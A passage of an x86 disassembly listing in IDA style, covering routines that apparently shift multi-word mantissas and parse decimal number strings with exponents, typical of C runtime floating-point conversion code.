jmp short loc_412546
; ---------------------------------------------------------------------------
loc_4124E0: ; CODE XREF: sub_41225B:loc_4124D6j
mov eax, esi
cdq
push 1Fh
pop ecx
and edx, ecx
add eax, edx
sar eax, 5
and esi, 8000001Fh
jns short loc_4124FA
dec esi
or esi, 0FFFFFFE0h
inc esi
loc_4124FA: ; CODE XREF: sub_41225B+298j
and [ebp+arg_0], 0
xor edx, edx
sub ecx, esi
inc edx
shl edx, cl
lea ecx, [ebp+eax*4+var_20]
mov esi, [ecx]
lea edi, [esi+edx]
cmp edi, esi
jb short loc_412516
cmp edi, edx
jnb short loc_41251D
loc_412516: ; CODE XREF: sub_41225B+2B5j
mov [ebp+arg_0], 1
loc_41251D: ; CODE XREF: sub_41225B+2B9j
mov [ecx], edi
mov ecx, [ebp+arg_0]
jmp short loc_412543
; ---------------------------------------------------------------------------
loc_412524: ; CODE XREF: sub_41225B+2E9j
test ecx, ecx
jz short loc_412546
lea ecx, [ebp+eax*4+var_20]
mov edx, [ecx]
lea esi, [edx+1]
xor edi, edi
cmp esi, edx
jb short loc_41253C
cmp esi, 1
jnb short loc_41253F
loc_41253C: ; CODE XREF: sub_41225B+2DAj
xor edi, edi
inc edi
loc_41253F: ; CODE XREF: sub_41225B+2DFj
mov [ecx], esi
mov ecx, edi
loc_412543: ; CODE XREF: sub_41225B+2C7j
dec eax
jns short loc_412524
loc_412546: ; CODE XREF: sub_41225B+263j
; sub_41225B+283j ...
mov ecx, [ebp+var_10]
or eax, 0FFFFFFFFh
shl eax, cl
and [ebx], eax
mov eax, [ebp+var_C]
inc eax
cmp eax, 3
jge short loc_412566
push 3
pop ecx
lea edi, [ebp+eax*4+var_20]
sub ecx, eax
xor eax, eax
rep stosd
loc_412566: ; CODE XREF: sub_41225B+2FCj
mov ecx, dword_424254
inc ecx
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_412587
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_412587: ; CODE XREF: sub_41225B+325j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_4125A2: ; CODE XREF: sub_41225B+372j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_4125A2
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_4125DC: ; CODE XREF: sub_41225B+398j
cmp edx, eax
jl short loc_4125E8
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_4125ED
; ---------------------------------------------------------------------------
loc_4125E8: ; CODE XREF: sub_41225B+383j
and [ebp+edx*4+var_20], 0
loc_4125ED: ; CODE XREF: sub_41225B+38Bj
dec edx
sub ecx, 4
test edx, edx
jge short loc_4125DC
loc_4125F5: ; CODE XREF: sub_41225B+188j
push 2
xor ebx, ebx
pop eax
jmp loc_412759
; ---------------------------------------------------------------------------
loc_4125FF: ; CODE XREF: sub_41225B+18Fj
cmp ebx, dword_424248
mov ecx, dword_424254
jl loc_4126BE
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosd
or [ebp+var_20], 80000000h
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_41263A
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_41263A: ; CODE XREF: sub_41225B+3D8j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_412655: ; CODE XREF: sub_41225B+425j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_412655
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_41268F: ; CODE XREF: sub_41225B+44Bj
cmp edx, eax
jl short loc_41269B
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_4126A0
; ---------------------------------------------------------------------------
loc_41269B: ; CODE XREF: sub_41225B+436j
and [ebp+edx*4+var_20], 0
loc_4126A0: ; CODE XREF: sub_41225B+43Ej
dec edx
sub ecx, 4
test edx, edx
jge short loc_41268F
mov eax, dword_424248
mov ecx, dword_42425C
lea ebx, [ecx+eax]
xor eax, eax
inc eax
jmp loc_412759
; ---------------------------------------------------------------------------
loc_4126BE: ; CODE XREF: sub_41225B+3B0j
mov eax, dword_42425C
and [ebp+var_20], 7FFFFFFFh
add ebx, eax
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_4126E6
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_4126E6: ; CODE XREF: sub_41225B+484j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or esi, 0FFFFFFFFh
mov ecx, edx
shl esi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not esi
loc_412701: ; CODE XREF: sub_41225B+4D4j
mov ecx, [ebp+arg_0]
mov edi, [ebp+ecx*4+var_20]
mov ecx, edi
and ecx, esi
mov [ebp+var_10], ecx
mov ecx, edx
shr edi, cl
mov ecx, [ebp+arg_0]
or edi, [ebp+var_C]
mov [ebp+ecx*4+var_20], edi
mov edi, [ebp+var_10]
mov ecx, [ebp+var_4]
shl edi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], edi
jl short loc_412701
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_41273E: ; CODE XREF: sub_41225B+4FAj
cmp edx, eax
jl short loc_41274A
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_41274F
; ---------------------------------------------------------------------------
loc_41274A: ; CODE XREF: sub_41225B+4E5j
and [ebp+edx*4+var_20], 0
loc_41274F: ; CODE XREF: sub_41225B+4EDj
dec edx
sub ecx, 4
test edx, edx
jge short loc_41273E
xor eax, eax
loc_412759: ; CODE XREF: sub_41225B+39Fj
; sub_41225B+45Ej
pop esi
loc_41275A: ; CODE XREF: sub_41225B+55j
; sub_41225B+65j
push 1Fh
pop ecx
sub ecx, dword_424254
shl ebx, cl
mov ecx, [ebp+var_14]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or ebx, ecx
mov ecx, dword_424258
or ebx, [ebp+var_20]
cmp ecx, 40h
jnz short loc_41278F
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_1C]
mov [ecx+4], ebx
mov [ecx], edx
jmp short loc_412799
; ---------------------------------------------------------------------------
loc_41278F: ; CODE XREF: sub_41225B+525j
cmp ecx, 20h
jnz short loc_412799
mov ecx, [ebp+arg_4]
mov [ecx], ebx
loc_412799: ; CODE XREF: sub_41225B+532j
; sub_41225B+537j
pop edi
pop ebx
leave
retn
sub_41225B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41279D proc near ; CODE XREF: sub_41185D+37p
; sub_411903+37p
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_46 = dword ptr -46h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_32 = dword ptr -32h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_9 = byte ptr -9
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 7Ch
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
xor ebx, ebx
push esi
xor esi, esi
mov [ebp+var_7C], eax
mov eax, [ebp+arg_4]
inc esi
xor ecx, ecx
cmp [ebp+arg_1C], ebx
push edi
mov [ebp+var_70], eax
lea edi, [ebp+var_20]
mov [ebp+var_74], ebx
mov [ebp+var_68], esi
mov [ebp+var_4C], ebx
mov [ebp+var_58], ebx
mov [ebp+var_5C], ebx
mov [ebp+var_60], ebx
mov [ebp+var_64], ebx
mov [ebp+var_50], ebx
mov [ebp+var_6C], ebx
jnz short loc_412805
call sub_405B83
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
xor eax, eax
jmp loc_412E1F
; ---------------------------------------------------------------------------
loc_412805: ; CODE XREF: sub_41279D+47j
mov edx, [ebp+arg_8]
mov [ebp+var_54], edx
loc_41280B: ; CODE XREF: sub_41279D+81j
mov al, [edx]
cmp al, 20h
jz short loc_41281D
cmp al, 9
jz short loc_41281D
cmp al, 0Ah
jz short loc_41281D
cmp al, 0Dh
jnz short loc_412820
loc_41281D: ; CODE XREF: sub_41279D+72j
; sub_41279D+76j ...
inc edx
jmp short loc_41280B
; ---------------------------------------------------------------------------
loc_412820: ; CODE XREF: sub_41279D+7Ej
mov bl, 30h
loc_412822: ; CODE XREF: sub_41279D+A6j
; sub_41279D+BCj ...
mov al, [edx]
inc edx
cmp ecx, 0Bh ; switch 12 cases
ja loc_412A5D ; default
; jumptable 0041282E case 10
jmp ds:off_412E31[ecx*4] ; switch jump
loc_412835: ; DATA XREF: .text:off_412E31o
mov cl, al ; jumptable 0041282E case 0
sub cl, 31h
cmp cl, 8
ja short loc_412845
loc_41283F: ; CODE XREF: sub_41279D+F7j
; sub_41279D+14Aj
push 3
loc_412841: ; CODE XREF: sub_41279D+201j
; sub_41279D+218j
pop ecx
dec edx
jmp short loc_412822
; ---------------------------------------------------------------------------
loc_412845: ; CODE XREF: sub_41279D+A0j
mov ecx, [ebp+arg_1C]
mov ecx, [ecx]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
cmp al, [ecx]
jnz short loc_41285B
loc_412856: ; CODE XREF: sub_41279D+15Fj
push 5
loc_412858: ; CODE XREF: sub_41279D+10Cj
; sub_41279D+138j ...
pop ecx
jmp short loc_412822
; ---------------------------------------------------------------------------
loc_41285B: ; CODE XREF: sub_41279D+B7j
movsx eax, al
sub eax, 2Bh
jz short loc_412880
dec eax
dec eax
jz short loc_412874
sub eax, 3
jnz loc_4129FB
loc_412870: ; CODE XREF: sub_41279D+118j
; sub_41279D+167j
mov ecx, esi
jmp short loc_412822
; ---------------------------------------------------------------------------
loc_412874: ; CODE XREF: sub_41279D+C8j
push 2
pop ecx
mov [ebp+var_74], 8000h
jmp short loc_412822
; ---------------------------------------------------------------------------
loc_412880: ; CODE XREF: sub_41279D+C4j
and [ebp+var_74], 0
push 2
pop ecx
jmp short loc_412822
; ---------------------------------------------------------------------------
loc_412889: ; CODE XREF: sub_41279D+91j
; DATA XREF: .text:off_412E31o
mov cl, al ; jumptable 0041282E case 1
sub cl, 31h
cmp cl, 8
mov [ebp+var_58], esi
jbe short loc_41283F
mov ecx, [ebp+arg_1C]
mov ecx, [ecx]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
cmp al, [ecx]
jnz short loc_4128AB
loc_4128A7: ; CODE XREF: sub_41279D+1A7j
push 4
jmp short loc_412858
; ---------------------------------------------------------------------------
loc_4128AB: ; CODE XREF: sub_41279D+108j
cmp al, 2Bh
jz short loc_4128D7
cmp al, 2Dh
jz short loc_4128D7
cmp al, bl
jz short loc_412870
loc_4128B7: ; CODE XREF: sub_41279D+1B5j
cmp al, 43h
jle loc_4129FB
cmp al, 45h
jle short loc_4128D3
cmp al, 63h
jle loc_4129FB
cmp al, 65h
jg loc_4129FB
loc_4128D3: ; CODE XREF: sub_41279D+124j
push 6
jmp short loc_412858
; ---------------------------------------------------------------------------
loc_4128D7: ; CODE XREF: sub_41279D+110j
; sub_41279D+114j ...
dec edx
push 0Bh
jmp loc_412858
; ---------------------------------------------------------------------------
loc_4128DF: ; CODE XREF: sub_41279D+91j
; DATA XREF: .text:off_412E31o
mov cl, al ; jumptable 0041282E case 2
sub cl, 31h
cmp cl, 8
jbe loc_41283F
mov ecx, [ebp+arg_1C]
mov ecx, [ecx]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
cmp al, [ecx]
jz loc_412856
cmp al, bl
jz loc_412870
loc_41290A: ; CODE XREF: sub_41279D+1F9j
; sub_41279D:loc_4129C9j
mov edx, [ebp+var_54]
jmp loc_412A26
; ---------------------------------------------------------------------------
loc_412912: ; CODE XREF: sub_41279D+91j
; DATA XREF: .text:off_412E31o
mov [ebp+var_58], esi ; jumptable 0041282E case 3
jmp short loc_412931
; ---------------------------------------------------------------------------
loc_412917: ; CODE XREF: sub_41279D+196j
cmp al, 39h
jg short loc_412935
cmp [ebp+var_4C], 19h
jnb short loc_41292B
inc [ebp+var_4C]
sub al, bl
mov [edi], al
inc edi
jmp short loc_41292E
; ---------------------------------------------------------------------------
loc_41292B: ; CODE XREF: sub_41279D+182j
inc [ebp+var_50]
loc_41292E: ; CODE XREF: sub_41279D+18Cj
mov al, [edx]
inc edx
loc_412931: ; CODE XREF: sub_41279D+178j
cmp al, bl
jge short loc_412917
loc_412935: ; CODE XREF: sub_41279D+17Cj
mov ecx, [ebp+arg_1C]
mov ecx, [ecx]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
cmp al, [ecx]
jz loc_4128A7
loc_41294A: ; CODE XREF: sub_41279D+1D6j
; sub_41279D+1F0j
cmp al, 2Bh
jz short loc_4128D7
cmp al, 2Dh
jz short loc_4128D7
jmp loc_4128B7
; ---------------------------------------------------------------------------
loc_412957: ; CODE XREF: sub_41279D+91j
; DATA XREF: .text:off_412E31o
cmp [ebp+var_4C], 0 ; jumptable 0041282E case 4
mov [ebp+var_58], esi
mov [ebp+var_5C], esi
jnz short loc_412989
jmp short loc_41296B
; ---------------------------------------------------------------------------
loc_412965: ; CODE XREF: sub_41279D+1D0j
dec [ebp+var_50]
mov al, [edx]
inc edx
loc_41296B: ; CODE XREF: sub_41279D+1C6j
cmp al, bl
jz short loc_412965
jmp short loc_412989
; ---------------------------------------------------------------------------
loc_412971: ; CODE XREF: sub_41279D+1EEj
cmp al, 39h
jg short loc_41294A
cmp [ebp+var_4C], 19h
jnb short loc_412986
inc [ebp+var_4C]
sub al, bl
mov [edi], al
inc edi
dec [ebp+var_50]
loc_412986: ; CODE XREF: sub_41279D+1DCj
mov al, [edx]
inc edx
loc_412989: ; CODE XREF: sub_41279D+1C4j
; sub_41279D+1D2j
cmp al, bl
jge short loc_412971
jmp short loc_41294A
; ---------------------------------------------------------------------------
loc_41298F: ; CODE XREF: sub_41279D+91j
; DATA XREF: .text:off_412E31o
sub al, bl ; jumptable 0041282E case 5
cmp al, 9
mov [ebp+var_5C], esi
ja loc_41290A
push 4
jmp loc_412841
; ---------------------------------------------------------------------------
loc_4129A3: ; CODE XREF: sub_41279D+91j
; DATA XREF: .text:off_412E31o
lea ecx, [edx-2] ; jumptable 0041282E case 6
mov [ebp+var_54], ecx
mov cl, al
sub cl, 31h
cmp cl, 8
ja short loc_4129BA
loc_4129B3: ; CODE XREF: sub_41279D+25Cj
; sub_41279D+269j
push 9
jmp loc_412841
; ---------------------------------------------------------------------------
loc_4129BA: ; CODE XREF: sub_41279D+214j
movsx eax, al
sub eax, 2Bh
jz short loc_4129E2
dec eax
dec eax
jz short loc_4129D6
sub eax, 3
loc_4129C9: ; CODE XREF: sub_41279D+26Dj
jnz loc_41290A
push 8
jmp loc_412858
; ---------------------------------------------------------------------------
loc_4129D6: ; CODE XREF: sub_41279D+227j
; sub_41279D+285j
or [ebp+var_68], 0FFFFFFFFh
push 7
pop ecx
jmp loc_412822
; ---------------------------------------------------------------------------
loc_4129E2: ; CODE XREF: sub_41279D+223j
; sub_41279D+281j
push 7
jmp loc_412858
; ---------------------------------------------------------------------------
loc_4129E9: ; CODE XREF: sub_41279D+91j
; DATA XREF: .text:off_412E31o
mov [ebp+var_60], esi ; jumptable 0041282E case 8
jmp short loc_4129F1
; ---------------------------------------------------------------------------
loc_4129EE: ; CODE XREF: sub_41279D+256j
mov al, [edx]
inc edx
loc_4129F1: ; CODE XREF: sub_41279D+24Fj
cmp al, bl
jz short loc_4129EE
sub al, 31h
cmp al, 8
jbe short loc_4129B3
loc_4129FB: ; CODE XREF: sub_41279D+CDj
; sub_41279D+11Cj ...
dec edx
jmp short loc_412A26
; ---------------------------------------------------------------------------
loc_4129FE: ; CODE XREF: sub_41279D+91j
; DATA XREF: .text:off_412E31o
mov cl, al ; jumptable 0041282E case 7
sub cl, 31h
cmp cl, 8
jbe short loc_4129B3
cmp al, bl
jmp short loc_4129C9
; ---------------------------------------------------------------------------
loc_412A0C: ; CODE XREF: sub_41279D+91j
; DATA XREF: .text:off_412E31o
cmp [ebp+arg_18], 0 ; jumptable 0041282E case 11
jz short loc_412A59
movsx eax, al
sub eax, 2Bh
lea ecx, [edx-1]
mov [ebp+var_54], ecx
jz short loc_4129E2
dec eax
dec eax
jz short loc_4129D6
mov edx, ecx
loc_412A26: ; CODE XREF: sub_41279D+170j
; sub_41279D+25Fj ...
cmp [ebp+var_58], 0
mov eax, [ebp+var_70]
mov [eax], edx
jz loc_412DDA
push 18h
pop eax
cmp [ebp+var_4C], eax
jbe short loc_412A4D
cmp [ebp+var_9], 5
jl short loc_412A46
inc [ebp+var_9]
loc_412A46: ; CODE XREF: sub_41279D+2A4j
dec edi
inc [ebp+var_50]
mov [ebp+var_4C], eax
loc_412A4D: ; CODE XREF: sub_41279D+29Ej
cmp [ebp+var_4C], 0
jbe loc_412E01
jmp short loc_412AB2
; ---------------------------------------------------------------------------
loc_412A59: ; CODE XREF: sub_41279D+273j
push 0Ah
pop ecx
dec edx
loc_412A5D: ; CODE XREF: sub_41279D+8Bj
; sub_41279D+91j
; DATA XREF: ...
cmp ecx, 0Ah ; default
; jumptable 0041282E case 10
jnz loc_412822
jmp short loc_412A26
; ---------------------------------------------------------------------------
loc_412A68: ; CODE XREF: sub_41279D+91j
; DATA XREF: .text:off_412E31o
mov [ebp+var_60], esi ; jumptable 0041282E case 9
xor ecx, ecx
jmp short loc_412A88
; ---------------------------------------------------------------------------
loc_412A6F: ; CODE XREF: sub_41279D+2EDj
cmp al, 39h
jg short loc_412A93
imul ecx, 0Ah
movsx esi, al
lea ecx, [ecx+esi-30h]
cmp ecx, 1450h
jg short loc_412A8E
mov al, [edx]
inc edx
loc_412A88: ; CODE XREF: sub_41279D+2D0j
cmp al, bl
jge short loc_412A6F
jmp short loc_412A93
; ---------------------------------------------------------------------------
loc_412A8E: ; CODE XREF: sub_41279D+2E6j
mov ecx, 1451h
loc_412A93: ; CODE XREF: sub_41279D+2D4j
; sub_41279D+2EFj
mov [ebp+var_64], ecx
jmp short loc_412AA3
; ---------------------------------------------------------------------------
loc_412A98: ; CODE XREF: sub_41279D+308j
cmp al, 39h
jg loc_4129FB
mov al, [edx]
inc edx
loc_412AA3: ; CODE XREF: sub_41279D+2F9j
cmp al, bl
jge short loc_412A98
jmp loc_4129FB
; ---------------------------------------------------------------------------
loc_412AAC: ; CODE XREF: sub_41279D+319j
dec [ebp+var_4C]
inc [ebp+var_50]
loc_412AB2: ; CODE XREF: sub_41279D+2BAj
dec edi
cmp byte ptr [edi], 0
jz short loc_412AAC
lea eax, [ebp+var_3C]
push eax
push [ebp+var_4C]
lea eax, [ebp+var_20]
push eax
call sub_413B5A
mov eax, [ebp+var_64]
xor ecx, ecx
add esp, 0Ch
cmp [ebp+var_68], ecx
jge short loc_412AD7
neg eax
loc_412AD7: ; CODE XREF: sub_41279D+336j
add eax, [ebp+var_50]
cmp [ebp+var_60], ecx
jnz short loc_412AE2
add eax, [ebp+arg_10]
loc_412AE2: ; CODE XREF: sub_41279D+340j
cmp [ebp+var_5C], ecx
jnz short loc_412AEA
sub eax, [ebp+arg_14]
loc_412AEA: ; CODE XREF: sub_41279D+348j
cmp eax, 1450h
jg loc_412DE3
cmp eax, 0FFFFEBB0h
jl loc_412DFA
mov esi, offset dword_424260
sub esi, 60h
cmp eax, ecx
mov [ebp+var_54], eax
jz loc_412DC8
jge short loc_412B22
neg eax
mov esi, offset dword_4243C0
mov [ebp+var_54], eax
sub esi, 60h
loc_412B22: ; CODE XREF: sub_41279D+376j
cmp [ebp+arg_C], ecx
jnz short loc_412B2B
mov word ptr [ebp+var_3C], cx
loc_412B2B: ; CODE XREF: sub_41279D+388j
cmp [ebp+var_54], ecx
jz loc_412DC8
loc_412B34: ; CODE XREF: sub_41279D+625j
mov eax, [ebp+var_54]
sar [ebp+var_54], 3
add esi, 54h
and eax, 7
test eax, eax
mov [ebp+var_4C], esi
jz loc_412DBE
imul eax, 0Ch
add eax, esi
mov ebx, eax
cmp word ptr [ebx], 8000h
mov [ebp+var_70], ebx
jb short loc_412B71
mov esi, ebx
lea edi, [ebp+var_48]
movsd
movsd
movsd
dec [ebp+var_46]
mov esi, [ebp+var_4C]
lea ebx, [ebp+var_48]
mov [ebp+var_70], ebx
loc_412B71: ; CODE XREF: sub_41279D+3BEj
movzx edx, word ptr [ebx+0Ah]
mov ecx, [ebp+var_32]
xor eax, eax
mov [ebp+var_50], eax
mov [ebp+var_2C], eax
mov [ebp+var_28], eax
mov [ebp+var_24], eax
mov eax, edx
mov edi, 7FFFh
xor eax, ecx
and ecx, edi
and edx, edi
and eax, 8000h
cmp cx, 7FFFh
lea edi, [edx+ecx]
movzx edi, di
jnb loc_412DA4
cmp dx, 7FFFh
jnb loc_412DA4
cmp di, 0BFFDh
ja loc_412DA4
cmp di, 3FBFh
ja short loc_412BD3
xor eax, eax
mov [ebp+var_38], eax
mov [ebp+var_3C], eax
jmp loc_412DBB
; ---------------------------------------------------------------------------
loc_412BD3: ; CODE XREF: sub_41279D+427j
test cx, cx
jnz short loc_412BF7
inc edi
test dword ptr [ebp-34h], 7FFFFFFFh
jnz short loc_412BF7
cmp [ebp+var_38], 0
jnz short loc_412BF7
cmp [ebp+var_3C], 0
jnz short loc_412BF7
and word ptr [ebp+var_32], cx
jmp loc_412DBE
; ---------------------------------------------------------------------------
loc_412BF7: ; CODE XREF: sub_41279D+439j
; sub_41279D+443j ...
xor ecx, ecx
cmp dx, cx
jnz short loc_412C1F
inc edi
test dword ptr [ebx+8], 7FFFFFFFh
jnz short loc_412C1F
cmp [ebx+4], ecx
jnz short loc_412C1F
cmp [ebx], ecx
jnz short loc_412C1F
mov [ebp-34h], ecx
mov [ebp+var_38], ecx
mov [ebp+var_3C], ecx
jmp loc_412DBE
; ---------------------------------------------------------------------------
loc_412C1F: ; CODE XREF: sub_41279D+45Fj
; sub_41279D+469j ...
and [ebp+var_68], ecx
lea esi, [ebp+var_28]
mov [ebp+var_58], 5
loc_412C2C: ; CODE XREF: sub_41279D+4FFj
mov ecx, [ebp+var_68]
mov edx, [ebp+var_58]
add ecx, ecx
test edx, edx
mov [ebp+var_64], edx
jle short loc_412C90
lea ecx, [ebp+ecx+var_3C]
add ebx, 8
mov [ebp+var_5C], ecx
mov [ebp+var_60], ebx
loc_412C48: ; CODE XREF: sub_41279D+4EEj
mov ecx, [ebp+var_60]
mov edx, [ebp+var_5C]
movzx edx, word ptr [edx]
movzx ecx, word ptr [ecx]
and [ebp+var_78], 0
imul ecx, edx
mov edx, [esi-4]
lea ebx, [edx+ecx]
cmp ebx, edx
jb short loc_412C69
cmp ebx, ecx
jnb short loc_412C70
loc_412C69: ; CODE XREF: sub_41279D+4C6j
mov [ebp+var_78], 1
loc_412C70: ; CODE XREF: sub_41279D+4CAj
cmp [ebp+var_78], 0
mov [esi-4], ebx
jz short loc_412C7C
inc word ptr [esi]
loc_412C7C: ; CODE XREF: sub_41279D+4DAj
add [ebp+var_5C], 2
sub [ebp+var_60], 2
dec [ebp+var_64]
cmp [ebp+var_64], 0
jg short loc_412C48
mov ebx, [ebp+var_70]
loc_412C90: ; CODE XREF: sub_41279D+49Cj
inc esi
inc esi
inc [ebp+var_68]
dec [ebp+var_58]
cmp [ebp+var_58], 0
jg short loc_412C2C
add edi, 0C002h
test di, di
jle short loc_412CE4
loc_412CA9: ; CODE XREF: sub_41279D+540j
test [ebp+var_24], 80000000h
jnz short loc_412CDF
mov esi, [ebp+var_28]
mov ecx, [ebp+var_2C]
shl [ebp+var_2C], 1
shr ecx, 1Fh
mov edx, esi
add esi, esi
or esi, ecx
mov ecx, [ebp+var_24]
shr edx, 1Fh
add ecx, ecx
or ecx, edx
add edi, 0FFFFh
test di, di
mov [ebp+var_28], esi
mov [ebp+var_24], ecx
jg short loc_412CA9
loc_412CDF: ; CODE XREF: sub_41279D+513j
test di, di
jg short loc_412D32
loc_412CE4: ; CODE XREF: sub_41279D+50Aj
add edi, 0FFFFh
test di, di
jge short loc_412D32
mov ecx, edi
neg ecx
movzx esi, cx
add edi, esi
loc_412CF8: ; CODE XREF: sub_41279D+588j
test byte ptr [ebp+var_2C], 1
jz short loc_412D01
inc [ebp+var_50]
loc_412D01: ; CODE XREF: sub_41279D+55Fj
mov ecx, [ebp+var_24]
mov ebx, [ebp+var_28]
mov edx, [ebp+var_28]
shr [ebp+var_24], 1
shl ecx, 1Fh
shr ebx, 1
or ebx, ecx
mov ecx, [ebp+var_2C]
shl edx, 1Fh
shr ecx, 1
or ecx, edx
dec esi
mov [ebp+var_28], ebx
mov [ebp+var_2C], ecx
jnz short loc_412CF8
cmp [ebp+var_50], 0
jz short loc_412D32
or word ptr [ebp+var_2C], 1
loc_412D32: ; CODE XREF: sub_41279D+545j
; sub_41279D+550j ...
cmp word ptr [ebp+var_2C], 8000h
ja short loc_412D4B
mov ecx, [ebp+var_2C]
and ecx, 1FFFFh
cmp ecx, 18000h
jnz short loc_412D7E
loc_412D4B: ; CODE XREF: sub_41279D+59Bj
cmp [ebp+var_2C+2], 0FFFFFFFFh
jnz short loc_412D7B
and [ebp+var_2C+2], 0
cmp [ebp+var_28+2], 0FFFFFFFFh
jnz short loc_412D76
and [ebp+var_28+2], 0
cmp word ptr [ebp+var_24+2], 0FFFFh
jnz short loc_412D70
mov word ptr [ebp+var_24+2], 8000h
inc edi
jmp short loc_412D7E
; ---------------------------------------------------------------------------
loc_412D70: ; CODE XREF: sub_41279D+5C8j
inc word ptr [ebp+var_24+2]
jmp short loc_412D7E
; ---------------------------------------------------------------------------
loc_412D76: ; CODE XREF: sub_41279D+5BCj
inc [ebp+var_28+2]
jmp short loc_412D7E
; ---------------------------------------------------------------------------
loc_412D7B: ; CODE XREF: sub_41279D+5B2j
inc [ebp+var_2C+2]
loc_412D7E: ; CODE XREF: sub_41279D+5ACj
; sub_41279D+5D1j ...
cmp di, 7FFFh
mov esi, [ebp+var_4C]
jnb short loc_412DA4
mov cx, word ptr [ebp+var_2C+2]
mov word ptr [ebp+var_3C], cx
mov ecx, [ebp+var_28]
mov [ebp+var_3C+2], ecx
mov ecx, [ebp+var_24]
or edi, eax
mov [ebp+var_38+2], ecx
mov word ptr [ebp+var_32], di
jmp short loc_412DBE
; ---------------------------------------------------------------------------
loc_412DA4: ; CODE XREF: sub_41279D+406j
; sub_41279D+411j ...
neg ax
sbb eax, eax
and [ebp+var_38], 0
and eax, 80000000h
add eax, 7FFF8000h
and [ebp+var_3C], 0
loc_412DBB: ; CODE XREF: sub_41279D+431j
mov [ebp-34h], eax
loc_412DBE: ; CODE XREF: sub_41279D+3A9j
; sub_41279D+455j ...
cmp [ebp+var_54], 0
jnz loc_412B34
loc_412DC8: ; CODE XREF: sub_41279D+370j
; sub_41279D+391j
mov eax, [ebp-34h]
movzx ecx, word ptr [ebp+var_3C]
mov esi, [ebp+var_3C+2]
mov edx, [ebp+var_38+2]
shr eax, 10h
jmp short loc_412E09
; ---------------------------------------------------------------------------
loc_412DDA: ; CODE XREF: sub_41279D+292j
mov [ebp+var_6C], 4
jmp short loc_412E01
; ---------------------------------------------------------------------------
loc_412DE3: ; CODE XREF: sub_41279D+352j
xor esi, esi
mov eax, 7FFFh
mov edx, 80000000h
xor ecx, ecx
mov [ebp+var_6C], 2
jmp short loc_412E09
; ---------------------------------------------------------------------------
loc_412DFA: ; CODE XREF: sub_41279D+35Dj
mov [ebp+var_6C], 1
loc_412E01: ; CODE XREF: sub_41279D+2B4j
; sub_41279D+644j
xor ecx, ecx
xor eax, eax
xor edx, edx
xor esi, esi
loc_412E09: ; CODE XREF: sub_41279D+63Bj
; sub_41279D+65Bj
mov edi, [ebp+var_7C]
or eax, [ebp+var_74]
mov [edi], cx
mov [edi+0Ah], ax
mov eax, [ebp+var_6C]
mov [edi+2], esi
mov [edi+6], edx
loc_412E1F: ; CODE XREF: sub_41279D+63j
mov ecx, [ebp+var_4]
pop edi
pop esi
